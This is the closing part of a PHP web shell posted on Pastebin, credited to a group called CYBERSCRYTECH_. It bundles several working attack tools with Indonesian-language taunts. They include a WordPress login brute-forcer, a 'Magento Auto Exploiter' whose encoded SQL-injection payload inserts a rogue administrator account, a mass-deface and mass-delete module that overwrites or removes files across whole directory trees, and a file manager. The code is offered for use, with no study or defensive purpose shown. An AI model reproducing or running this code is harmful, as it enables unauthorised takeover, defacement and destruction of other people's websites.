  4045.          $this->user = $_POST["user"];
  4046.          $this->open = $_POST["list"];
  4047.        }
  4048.  
  4049.        public function Xregex() {
  4050.          if(preg_match("@/wp-login.php@", $this->host)) {
  4051.              return true;
  4052.          } else {
  4053.             $this->host = $_POST["host"]."/wp-login.php";
  4054.          }
  4055.      }
  4056.  
  4057.       public function brute() {
  4058.            $list = array_filter(explode("\n", $this->open));
  4059.            foreach($list as $this->list) {
  4060.            for($i=0; $i < count($this->list); $i++) {
  4061.                         $this->Xcurl();
  4062.                      }
  4063.               }
  4064.        }
  4065.  
  4066.         private function cool() {
  4067.             echo "[+] Host:"."<font color='black'>{$this->host}</font>";
  4068.             echo " <br/>[+] User:"."<font color='black'>{$this->user}</font>";
  4069.             echo " <br/>[+] Pass:"."<font color='black'>{$this->list}</font>";
  4070.         }
  4071.  
  4072.         private function Xcurl() {
  4073.             $curl = curl_init();
  4074.             curl_setopt($curl, CURLOPT_URL, $this->host);
  4075.             curl_setopt($curl, CURLOPT_USERAGENT, $this->useragent);
  4076.             curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
  4077.             curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 10);
  4078.             curl_setopt($curl, CURLOPT_POST, true);
  4079.             curl_setopt($curl, CURLOPT_POSTFIELDS, "log=$this->user&pwd=$this->list&wp-submit=Login&redirect_to=$this->host/wp-admin/");
  4080.             $exec = curl_exec($curl);
  4081.             $http = curl_getinfo($curl, CURLINFO_HTTP_CODE);
  4082.             $this->cool();
  4083.             if($http == 302) {
  4084.                  echo "<font color='#00FF00'> <br/>[+] Sukses! [+] Tinggal Login Aja</font><br>";
  4085.                  break;
  4086.             } else {
  4087.                 echo "<font color='white'><br/>[+] Ggal Jancok! -_-</font><br>";
  4088.             }
  4089.                 curl_close($curl);
  4090.         }
  4091. }
  4092.  
  4093. $wp = new berandal();
  4094. $wp->useragent = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0";
  4095. $wp->banner();
  4096. $wp->extract_post();
  4097. $wp->Xregex();
  4098. $wp->brute();
  4099.     }
  4100. elseif($_GET['666'] == 'magento') {
  4101.  echo '<div class="mybox"><h1>Magento Auto Exploiter</h1>
  4102. <form method="post" action="">
  4103. <textarea placeholder="http://127.0.0.1/" class="mybox" rows="10" name="target" required></textarea><br><br>
  4104. <input class="kotak" type=submit name=submit value="Start"><br>
  4105. </form></div>';
  4106. error_reporting(0);
  4107. set_time_limit(0);
  4108.  
  4109. function bersihkan($htmltags) {
  4110.     $htmltags = str_replace('<span class="price">','',$htmltags);
  4111.     $htmltags = str_replace('</span>','',$htmltags);
  4112.     return $htmltags;
  4113.    
  4114. }
  4115.  
  4116. ///postdata
  4117. $postadm = "filter=cG9wdWxhcml0eVtmcm9tXT0wJnBvcHVsYXJpdHlbdG9dPTMmcG9wdWxhcml0eVtmaWVsZF9leHByXT0wKTtTRVQgQFNBTFQgPSAncnAnO1NFVCBAUEFTUyA9IENPTkNBVChNRDUoQ09OQ0FUKCBAU0FMVCAsICdzdHVwaWQ0OCcpICksIENPTkNBVCgnOicsIEBTQUxUICkpO1NFTEVDVCBARVhUUkEgOj0gTUFYKGV4dHJhKSBGUk9NIGFkbWluX3VzZXIgV0hFUkUgZXh0cmEgSVMgTk9UIE5VTEw7SU5TRVJUIElOVE8gYGFkbWluX3VzZXJgIChgZmlyc3RuYW1lYCwgYGxhc3RuYW1lYCxgZW1haWxgLGB1c2VybmFtZWAsYHBhc3N3b3JkYCxgY3JlYXRlZGAsYGxvZ251bWAsYHJlbG9hZF9hY2xfZmxhZ2AsYGlzX2FjdGl2ZWAsYGV4dHJhYCxgcnBfdG9rZW5gLGBycF90b2tlbl9jcmVhdGVkX2F0YCkgVkFMVUVTICgnRmlyc3RuYW1lJywnTGFzdG5hbWUnLCdlbWFpbEBleGFtcGxlLmNvbScsJ3N0dXBpZCcsQFBBU1MsTk9XKCksMCwwLDEsQEVYVFJBLE5VTEwsIE5PVygpKTtJTlNFUlQgSU5UTyBgYWRtaW5fcm9sZWAgKHBhcmVudF9pZCx0cmVlX2xldmVsLHNvcnRfb3JkZXIscm9sZV90eXBlLHVzZXJfaWQscm9sZV9uYW1lKSBWQUxVRVMgKDEsMiwwLCdVJywoU0VMRUNUIHVzZXJfaWQgRlJPTSBhZG1pbl91c2VyIFdIRVJFIHVzZXJuYW1lID0gJ3N0dXBpZCcpLCdGaXJzdG5hbWUnKTs%3D&___directive=e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ&forwarded=1";
  4118. $postlog = "form_key=3ryAIBlm7bJ3naj9&login%5Busername%5D=owlsquad&login%5Bpassword%5D=owlsquad";
  4119. $postdwn = "username=owlsquad&password=owlsquad";
  4120. $pageadm = "/admin/Cms_Wysiwyg/directive/index/";
  4121. $pagelog = "/admin/";
  4122. $pagedwn = "/downloader/";
  4123.  
  4124. function berandal_CURL($url,$data,$page) {
  4125. $ch = curl_init();
  4126. curl_setopt ($ch, CURLOPT_URL, $url.$page);
  4127. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
  4128. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  4129. curl_setopt ($ch, CURLOPT_POSTFIELDS, $data);
  4130. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  4131. curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
  4132. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  4133. curl_setopt ($ch, CURLOPT_POST, 1);
  4134. $headers  = array();
  4135. $headers[] = 'Content-Type: application/x-www-form-urlencoded';
  4136.  
  4137. curl_setopt ($ch, CURLOPT_HTTPHEADER, $headers);
  4138. curl_setopt ($ch, CURLOPT_HEADER, 1);
  4139. $result = curl_exec ($ch);
  4140. curl_close($ch);
  4141. return $result;
  4142. }
  4143. print $banner;
  4144.  
  4145. if(isset($_POST['target'])){
  4146. $j=explode("\r\n",$_POST['target']);
  4147. foreach($j as $site){
  4148.  
  4149.     echo'<div class="mybox"><font color="white">';
  4150. print "Checking, Please wait!
  4151. <br>";
  4152. echo'</font>';
  4153. $sikat = berandal_CURL($site , $postadm, $pageadm);
  4154.  
  4155. if(preg_match('#200 OK#', $sikat)) {
  4156.     $expres = "Success";
  4157.     $ceklog = berandal_CURL($site , $postlog, $pagelog);
  4158.    
  4159. if(preg_match('#302 Moved#', $ceklog)) {
  4160.     preg_match_all('#<span>(.*?)</span>#si', $ceklog, $match);
  4161.     foreach($match as $val)
  4162.     {
  4163.     $ltm = $val[0];
  4164.     $avo = $val[1];
  4165.     break;
  4166.     }
  4167.     $admlog = "Sukses!";
  4168.     $user = "cyberscry";
  4169.     $pass = "cyberscry";
  4170.     $cekdwn = berandal_CURL($site , $postdwn, $pagedwn);
  4171.     if(preg_match('#Return to Admin#', $cekdwn)) {
  4172.     $dwnlog = "Login Sukses!";
  4173. }else {
  4174.     $dwnlog = "Login Gagal anjg!";
  4175. }
  4176. }else {
  4177.     $admlog = "Gagal!";
  4178.     $user = "NULL";
  4179.     $pass = "NULL";
  4180. }
  4181. }else {
  4182.     $admlog = "Gagal!";
  4183.     $expres = "Gagal!";
  4184.     $user = "NULL";
  4185.     $pass = "NULL";
  4186.     $dwnlog = "Login Gagal Anjg!";
  4187.     $ltm = "NULL";
  4188.     $avo = "NULL";
  4189. }
  4190.  
  4191. ///echo result
  4192. $logger = '
  4193. <br>
  4194.     <font color="white">
  4195.     <h4>[ '.$site.' ]</h4></font><br>
  4196.     Exploiting  : <font color="lime">'.$expres.'</font><br>
  4197.     Login Admin : <font color="lime">'.$admlog.'</font><br>
  4198.     Lifetime Sales: <font color="gold">'.bersihkan($ltm).'</font><br>
  4199.     Average Order   : <font color="gold">'.bersihkan($avo).'</font><br>
  4200.     Downloader  : <font color="white">'.$dwnlog.'</font><br>
  4201.     Username    :<font color="cyan"><b> '.$user.'</font></b><br>
  4202.     Password    :<font color="cyan"><b> '.$pass.'</font></b><br>
  4203.     </div>';
  4204.     echo $logger;
  4205. ///diilangin
  4206. }
  4207. }
  4208. }
  4209. elseif($_GET['666'] == 'mass_deface') {
  4210.     echo "<div class='mybox'><center><form action=\"\" method=\"post\">\n";
  4211.     $dirr=$_POST['d_dir'];
  4212.     $index = $_POST["script"];
  4213.     $index = str_replace('"',"'",$index);
  4214.     $index = stripslashes($index);
  4215.     function edit_file($file,$index){
  4216.         if (is_writable($file)) {
  4217.         clear_fill($file,$index);
  4218.         echo "<Span style='color:green;'><strong> [+] Nyabun 100% Sukses, COk! </strong></span><br></center>";
  4219.         }
  4220.         else {
  4221.             echo "<Span style='color:red;'><strong> [-] Ternyata Tidak Boleh Menyabun Disini :( </strong></span><br></center>";
  4222.             }
  4223.             }
  4224.     function hapus_massal($dir,$namafile) {
  4225.         if(is_writable($dir)) {
  4226.             $dira = scandir($dir);
  4227.             foreach($dira as $dirb) {
  4228.                 $dirc = "$dir/$dirb";
  4229.                 $lokasi = $dirc.'/'.$namafile;
  4230.                 if($dirb === '.') {
  4231.                     if(file_exists("$dir/$namafile")) {
  4232.                         unlink("$dir/$namafile");
  4233.                     }
  4234.                 } elseif($dirb === '..') {
  4235.                     if(file_exists("".dirname($dir)."/$namafile")) {
  4236.                         unlink("".dirname($dir)."/$namafile");
  4237.                     }
  4238.                 } else {
  4239.                     if(is_dir($dirc)) {
  4240.                         if(is_writable($dirc)) {
  4241.                             if(file_exists($lokasi)) {
  4242.                                 echo "[<font color=white>DELETED</font>] $lokasi<br>";
  4243.                                 unlink($lokasi);
  4244.                                 $berandal = hapus_massal($dirc,$namafile);
  4245.                             }
  4246.                         }
  4247.                     }
  4248.                 }
  4249.             }
  4250.         }
  4251.     }
  4252.     function clear_fill($file,$index){
  4253.         if(file_exists($file)){
  4254.             $handle = fopen($file,'w');
  4255.             fwrite($handle,'');
  4256.             fwrite($handle,$index);
  4257.             fclose($handle);  } }
  4258.  
  4259.     function gass(){
  4260.         global $dirr , $index ;
  4261.         chdir($dirr);
  4262.         $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  4263.         $files = scandir($dirr) ;
  4264.         $notallow = array(".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","..",".");
  4265.         sort($files);
  4266.         $n = 0 ;
  4267.         foreach ($files as $file){
  4268.             if ( $file != $me && is_dir($file) != 1 && !in_array($file, $notallow) ) {
  4269.                 echo "<center><Span style='color: #8A8A8A;'><strong>$dirr/</span>$file</strong> ====> ";
  4270.                 edit_file($file,$index);
  4271.                 flush();
  4272.                 $n = $n +1 ;
  4273.                 }
  4274.                 }
  4275.                 echo "<br>";
  4276.                 echo "<center><br><h3>$n Kali lu Ngecrot  Disini :v</h3></center><br>";
  4277.                     }
  4278.     function ListFiles($dirrall) {
  4279.  
  4280.     if($dh = opendir($dirrall)) {
  4281.  
  4282.        $files = Array();
  4283.        $inner_files = Array();
  4284.        $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  4285.        $notallow = array($me,".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","Thumbs.db");
  4286.         while($file = readdir($dh)) {
  4287.             if($file != "." && $file != ".." && $file[0] != '.' && !in_array($file, $notallow) ) {
  4288.                 if(is_dir($dirrall . "/" . $file)) {
  4289.                     $inner_files = ListFiles($dirrall . "/" . $file);
  4290.                     if(is_array($inner_files)) $files = array_merge($files, $inner_files);
  4291.                 } else {
  4292.                     array_push($files, $dirrall . "/" . $file);
  4293.                 }
  4294.             }
  4295.             }
  4296.  
  4297.             closedir($dh);
  4298.             return $files;
  4299.         }
  4300.     }
  4301.     function gass_all(){
  4302.         global $index ;
  4303.         $dirrall=$_POST['d_dir'];
  4304.         foreach (ListFiles($dirrall) as $key=>$file){
  4305.             $file = str_replace('//',"/",$file);
  4306.             echo "<center><strong>$file</strong> ===>";
  4307.             edit_file($file,$index);
  4308.             flush();
  4309.         }
  4310.         $key = $key+1;
  4311.     echo "<center><br><h3>$key Kali lu Ngecrot  Disini  :v</h3></center><br>"; }
  4312.     function sabun_massal($dir,$namafile,$isi_script) {
  4313.         if(is_writable($dir)) {
  4314.             $dira = scandir($dir);
  4315.             foreach($dira as $dirb) {
  4316.                 $dirc = "$dir/$dirb";
  4317.                 $lokasi = $dirc.'/'.$namafile;
  4318.                 if($dirb === '.') {
  4319.                     file_put_contents($lokasi, $isi_script);
  4320.                 } elseif($dirb === '..') {
  4321.                     file_put_contents($lokasi, $isi_script);
  4322.                 } else {
  4323.                     if(is_dir($dirc)) {
  4324.                         if(is_writable($dirc)) {
  4325.                             echo "[<font color=white>Selese Cok!</font>] $lokasi<br>";
  4326.                             file_put_contents($lokasi, $isi_script);
  4327.                             $berandal = sabun_massal($dirc,$namafile,$isi_script);
  4328.                         }
  4329.                     }
  4330.                 }
  4331.             }
  4332.         }
  4333.     }
  4334.     if($_POST['mass'] == 'onedir') {
  4335.         echo "<br> Versi Text Area<br><textarea style='background:black;outline:none;color:white;' name='index' rows='10' cols='67'>\n";
  4336.         $ini="http://";
  4337.         $mainpath=$_POST[d_dir];
  4338.         $file=$_POST[d_file];
  4339.         $dir=opendir("$mainpath");
  4340.         $code=base64_encode($_POST[script]);
  4341.         $indx=base64_decode($code);
  4342.         while($row=readdir($dir)){
  4343.         $start=@fopen("$row/$file","w+");
  4344.         $finish=@fwrite($start,$indx);
  4345.         if ($finish){
  4346.             echo"$ini$row/$file\n";
  4347.             }
  4348.         }
  4349.         echo "</textarea><br><br><br><b>Versi Text</b><br><br><br>\n";
  4350.         $mainpath=$_POST[d_dir];$file=$_POST[d_file];
  4351.         $dir=opendir("$mainpath");
  4352.         $code=base64_encode($_POST[script]);
  4353.         $indx=base64_decode($code);
  4354.         while($row=readdir($dir)){$start=@fopen("$row/$file","w+");
  4355.         $finish=@fwrite($start,$indx);
  4356.         if ($finish){echo '<a href="http://' . $row . '/' . $file . '" target="_blank">http://' . $row . '/' . $file . '</a><br>'; }
  4357.         }
  4358.  
  4359.     }
  4360.     elseif($_POST['mass'] == 'sabunkabeh') { gass(); }
  4361.     elseif($_POST['mass'] == 'hapusmassal') { hapus_massal($_POST['d_dir'], $_POST['d_file']); }
  4362.     elseif($_POST['mass'] == 'sabunmematikan') { gass_all(); }
  4363.     elseif($_POST['mass'] == 'massdeface') {
  4364.         echo "<div style='margin: 5px auto; padding: 5px'>";
  4365.         sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  4366.         echo "</div>";  }
  4367.     else {
  4368.         echo "
  4369.         <center><h1>Mass Deface</h1><hr color='white'><font style='text-decoration: underline;'>
  4370.         Pilih yang mana:<br>
  4371.         </font>
  4372.         <select class=\"select\" name=\"mass\"  style=\"width: 450px;\" height=\"10\">
  4373.         <option value=\"onedir\">Mass Deface 1 Dir</option>
  4374.         <option value=\"massdeface\">Mass Deface ALL Dir</option>
  4375.         <option value=\"sabunkabeh\">Sabun Massal Di Tempat</option>
  4376.         <option value=\"sabunmematikan\">Sabun Massal Bunuh Diri</option>
  4377.         <option value=\"hapusmassal\">Mass Delete Files</option></center></select><br>
  4378.         <font color='white' style='text-decoration: underline;'>Folder:</font><br>
  4379.         <input type='text' name='d_dir' value='$dir' style='width: 450px; color:white;' height='10'><br>
  4380.         <font color='white' style='text-decoration: underline;'>Nama File:</font><br>
  4381.         <input type='text' name='d_file' value='index.php' style='width: 450px; color:white;' height='10'><br>
  4382.         <font color='white' style='text-decoration: underline;'>Index File:</font><br>
  4383.         <textarea name='script' style='width: 450px; height: 200px; color:white;'>CYBERSCRYTECH_ IN HERE ^_^</textarea><br>
  4384.         <input type='submit' class='kotak' name='start' value='Mass Deface' style='width: 450px;'>
  4385.         </form></center></div>";
  4386.         }
  4387.     }
  4388. elseif($_GET['666'] == 'phinfo')
  4389. {@ob_start();@eval("phpinfo();");$buff = @ob_get_contents();@ob_end_clean();$awal = strpos($buff,"<body>")+6;$akhir = strpos($buff,"</body>");echo "<div class='mybox'><div class='phpinfo'>".substr($buff,$awal,$akhir-$awal)."</div></div>";}
  4390. elseif($_GET['act'] == 'delete') {
  4391.     $delete = unlink($_GET['file']);
  4392.     if($delete) {
  4393.         $act = "<script>window.location='?dir=".$dir."';</script>";
  4394.     } else {
  4395.         $act = "<font color=red>Gak dibolehin, Jancok!</font>";
  4396.     }
  4397.     echo $act;
  4398. }else {
  4399.     if(is_dir($dir) == true) {
  4400.         echo '<div class="mybox"><table width="100%" class="table_home" border="1" cellpadding="3" cellspacing="1" align="center">
  4401.         <tr>
  4402.         <th style="min-width:150px;" class="th_home"><center>Name</center></th>
  4403.         <th class="th_home"><center>Type</center></th>
  4404.         <th style="width:74px;min-width:74px;" class="th_home"><center>Size</center></th>
  4405.         <th style="width:150px;min-width:150px;" class="th_home"><center>Modified</center></th>
  4406.         <th style="width:80px;min-width:80px;" class="th_home"><center>Perms</center></th>
  4407.         <th style="width:200px;min-width:200px;" class="th_home"><center>Action</center></th>
  4408.         </tr>';
  4409.         $scandir = scandir($dir);
  4410.         foreach($scandir as $dirx) {
  4411.             $dtype = filetype("$dir/$dirx");
  4412.             $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
  4413.             if(!is_dir("$dir/$dirx")) continue;
  4414.             if($dirx === '..') {
  4415.                 $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
  4416.             } elseif($dirx === '.') {
  4417.                 $href = "<a href='?dir=$dir'>$dirx</a>";
  4418.             } else {
  4419.                 $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
  4420.             }
  4421.             if($dirx === '.' || $dirx === '..') {
  4422.                 $act_dir = "<a href='?act=newfile&dir=$dir'>+file</a> <font color='white'>|</font> <a href='?act=newfolder&dir=$dir'>+dir</a>";
  4423.                 } else {
  4424.                 $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>ren</a> <font color='white'>&nbsp&nbsp|</font> <a href='?dir=$dir&666=upload'>upl</a><font color='white'>&nbsp|</font> <a href='?act=delete_dir&dir=$dir/$dirx'>del</a>";
  4425.             }
  4426.             echo "<tr>";
  4427.             echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAQAAAC1+jfqAAAAAXNSR0IArs4c6QAAAAJiS0dEAP+Hj8y/AAAACXBIWXMAAAsTAAALEwEAmpwYAAAA00lEQVQoz6WRvUpDURCEvzmuwR8s8gr2ETvtLSRaKj6ArZU+VVAEwSqvJIhIwiX33nPO2IgayK2cbtmZWT4W/iv9HeacA697NQRY281Fr0du1hJPt90D+xgc6fnwXjC79JWyQdiTfOrf4nk/jZf0cVenIpEQImGjQsVod2cryvH4TEZC30kLjME+KUdRl24ZDQBkryIvtOJggLGri+hbdXgd90e9++hz6rR5jYtzZKsIDzhwFDTQDzZEsTz8CRO5pmVqB240ucRbM7kejTcalBfvn195EV+EajF1hgAAAABJRU5ErkJggg=='>$href</td>";
  4428.             echo "<td class='td_home'><center>$dtype</center></td>";
  4429.             echo "<td class='td_home'><center>-</center></th>";
  4430.             echo "<td class='td_home'><center>$dtime</center></td>";
  4431.             echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
  4432.             echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
  4433.         }
  4434.         echo "</tr>";
  4435.         foreach($scandir as $file) {
  4436.             $ftype = filetype("$dir/$file");
  4437.             $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
  4438.             $size = filesize("$dir/$file")/1024;
  4439.             $size = round($size,3);
  4440.             if($size > 1024) {
  4441.                 $size = round($size/1024,2). 'MB';
  4442.             } else {
  4443.                 $size = $size. 'KB';
  4444.             }
  4445.             if(!is_file("$dir/$file")) continue;
  4446.             echo "<tr>";
  4447.             echo "<td style='min-width:150px;' class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
  4448.             echo "<td style='width:74px;min-width:74px;' class='td_home'><center>$ftype</center></td>";
  4449.             echo "<td class='td_home'><center>$size</center></td>";
  4450.             echo "<td class='td_home'><center>$ftime</center></td>";
  4451.             echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
  4452.             echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> <font color='white'>&nbsp|</font> <a href='?act=rename&dir=$dir&file=$dir/$file'>ren</a> <font color='white'>|</font> <a href='?act=delete&dir=$dir&file=$dir/$file'>del</a> <font color='white'>|</font> <a href='?act=download&dir=$dir&file=$dir/$file'>dl</a></td>";
  4453.         }
  4454.         echo "</tr></table></div>";
  4455.     } else {
  4456.         echo "<font color=red>Gabisa buka directory cok :(</font>";
  4457.     }
  4458.     }
  4459.  
  4460. echo "<center>
  4461. <hr color='white'>Copyright &copy; ".date("Y")." - <a href='https://www.facebook.com/cybers.cry' target='blank'><font color='white'>CYBERSCRYTECH_</font></a> | Code by <a href='https://www.twitter.com/id_berandal' target='_blank'><font color=white>Berandal</font></a></center>";
  4462. ?>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top